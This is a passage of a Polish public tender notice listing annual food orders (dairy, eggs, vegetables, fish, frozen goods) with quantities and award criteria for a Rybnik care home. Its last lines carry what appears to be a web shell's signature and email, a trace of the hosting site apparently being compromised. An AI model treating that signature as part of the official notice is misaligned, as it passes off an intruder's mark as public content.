14.		Ser topiony w plastrach 130g . Skład: ser  min  22%, mleko 30%, masło,  mleko odtłuszczone, sól,  mieszanka przypraw Zawartość w 100g min:białko 14g, węglowodany 6g, tłuszcz 27g	szt.	1400
15.		Ser żółty zawartość tłuszczu 45% 
skład : mleko krowie, podpuszczka, sól, kultury bakterii mlekowych . Zawartość w 100g min: białko 23g, węglowodany 0g, tłuszcz 30g	kg	480
16.		Serek homogenizowany b/c  150g . Skład: mleko pełne pasteryzowane, czyste kultury mleczarskie,  zawartość tłuszczu  min. 4,0%. Zawartość w 100g min : białko 8,6g, węglowodany 4g, tłuszcz 8,5g	szt.	1750
17.		Serek homogenizowany owocowy  140g. Skład: twaróg odtłuszczony, owoce min 3,7%, mleko odtłuszczone, tłuszcz 3,5%, cukier,  śmietanka, bez konserwantów) . Zawartość w 100g min: białko 5,2g, węglowdany16,7g, tłuszcz 3,7g	szt.	3550
18.		Śmietana kremowa 30% kartonik 500ml,  wysoko pasteryzowana 	szt.	800
19.		Śmietanka do kawy jednorazowa UHT 10% tłuszczu. (opakowanie = 10szt., 1szt =10g)	op.	30
20.		Twaróg półtłusty opakowanie  250g zawierający znak weterynaryjny . Zawartość w 100g min: białko 16g, węglowodany 3,7g, tłuszcz 4g	kg	720
21.		Twarożek  ziarnisty 150g . Skład: ser twarogowy, woda, Zawartość w 100g: białko 16,5g, węglowodany 3,6 g, tłuszcz 4,5g	szt.	1900
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15500000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b><br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Zakup wraz z dostawą jaj dla Miejskiego Domu Pomocy Społecznej w Rybniku<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	
Wyszczególnienie towaru
	Jedn.
miary
	Ilość zamówienia              w dostawie rocznej
1	Jaja Kl. L , Symbol X  3( klatkowy)	szt.	20500
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>03142500-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>Zakup wraz z dostawą warzyw i owoców dla Miejskiego Domu Pomocy Społecznej w Rybniku.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b> Lp.	Wyszczególnienie towaru	Jednostka miary	Ilość zamówienia w dostawie rocznej
1.		Arbuz	kg	360
2.		Banan	kg	750
3.		Botwina	szt.	100
4.		Burak	kg	750
5.		Brokuł	kg	200
6.		Cebula	kg	400
7.		Cebulka zielona pęczek 50g	szt.	400
8.		Cytryna	kg	250
9.		Czosnek	szt.	260
10.		Fasola Jaś	kg	90
11.		Fasola czerwona	kg	30
12.		Fasolka szparagowa	kg	50
13.		Groch łuskany	kg	50
14.		Jabłka klasa I średnica 6-7 cm	kg	1250
15.		Kalafior	szt.	300
16.		Kalarepa	szt.	60
17.		Kapusta biała	kg	700
18.		Kapusta biała młoda 	kg	300
19.		Kapusta czerwona	kg	550
20.		Kapusta czerwona młoda 	kg	50
21.		Kapusta kiszona	kg	600
22.		Kapusta pekińska 	kg	400
23.		Kapusta włoska 	kg	50
24.		Koper zielony	szt.	1300
25.		Mandarynka	kg	300
26.		Marchew	kg	1350
27.		Morela	kg	100
28.		Nektaryna 	kg	120
29.		Ogórek kiszony	kg	580
30.		Ogórek małosolny	kg	90
31.		Ogórek zielony	kg	550
32.		Papryka czerwona	kg	40
33.		Pieczarki	kg	250
34.		Pietruszka korzeń	kg	380
35.		Pietruszka zielona pęczek 50g	szt.	750
36.		Pomarańcza	kg	400
37.		Pomidor	kg	1400
38.		Por zielony( sztuki)	szt.	700
39.		Rzodkiewka pęczek 180g	szt.	140
40.		Sałata lodowa	szt.	70
41.		Sałata zielona	szt.	100
42.		Seler	kg	400
43.		Śliwka węgierka	kg	50
44.		Szczypiorek pęczek  50g	szt.	500
45.		Truskawka	kg	150
46.		Ziemniak	kg	8700
47.		Ziemniak młody	kg	3300
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>03100000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>Zakup wraz z dostawą ryb i przetworów rybnych dla Miejskiego Domu Pomocy Społecznej w Rybniku.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b> Lp.	Wyszczególnienie towaru	Jednostka miary	Ilość zamówienia  
1.		Dorsz czarniak filet bez skóry SHP 8-16  zawartość glazury do 5%	kg	215
2.		Dorsz w galarecie  200g	szt	900
3.		Filet z makreli w sosie pomidorowym 125g	szt.	1200
4.		Filet z makreli w oleju 125g	szt.	1200
5.		Karp żywy	kg	100
6.		Makrela wędzona 300-500	kg	170
7.		Miruna filet bez skóry 200-400SHP  	kg	200
8.		Morszczuk filet SHP 0-5% glazury 	kg	100    
9.		Płaty śledziowe mrożone  4-6	kg	180
10.		Śledzie solone Matias 4-6	kg	200
11.		Tilapia filet zawartość glazury od 20-25%	kg	150
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>03311000-2, 15200000-0,
                    15220000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>9
                  
                <b>Nazwa: </b>Zakup wraz z dostawą produktów mrożonych dla Miejskiego Domu Pomocy Społecznej w Rybniku.           <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>   Lp.	Wyszczególnienie towaru	Jednostka miary	Ilość zamówienia  
1.		Barszcz ukraiński 2,5kg ( burak, pomidor, kapusta biała, fasolka szparagowa ziemniak, marchew, cebula, seler )	kg	210
2.		Brokuł  2,5kg	kg	180
3.		Fasolka szparagowa 2,5kg	kg	180
4.		Kluski śląskie 2,5 kg	kg	240
5.		Marchewka mrożona  2,5kg	kg	380
6.		Mieszanka 2składnikowa  2,5kg ( marchew, groszek)	kg	400
7.		Mieszanka 7 składnikowa 2,5kg ( marchew, fasolka szparagowa, por, kalafior, brukselka, kalarepa, seler )	kg	550
8.		Mieszanka kompotowa 2,5kg ( śliwka, wiśnia, aronia, porzeczka czerwona, czarna, brzoskwinia )	kg	2750
9.		Mieszanka z brokułami 2,5kg ( marchew, seler, brokuł, fasolka szparagowa, brukselka, kalafior )	kg	220
10.		Paprykarz 2,5kg ( pomidor, cukinia, papryka, fasolka szparagowa, cebula)	kg	15
11.		Podgrzybek  2,5kg 	kg	25
12.		Sałatka meksykańska 2,5kg (marchew, papryka, fasolka szparagowa, groch zielony, kukurydza )	kg	160
13.		 Szpinak 2,5kg	kg	200
14.		Truskawka mrożona 2,5kg	kg	300
15.		Wiśnia bez pestek 2,5kg	kg	45
16.		Włoszczyzna 2,5kg ( marchew, seler, pietruszka, por ) 	kg	50
17.		 Zupa jarzynowa 7 składnikowa 2,5kg ( marchew, groszek zielony, fasolka szparagowa, brukselka, kalafior, por, koperek)	kg	180
18.		Zupa kalafiorowa 2,5kg  (kalafior, marchew, pietruszka, seler, por)	kg	60
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15331100-8, 15896000-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com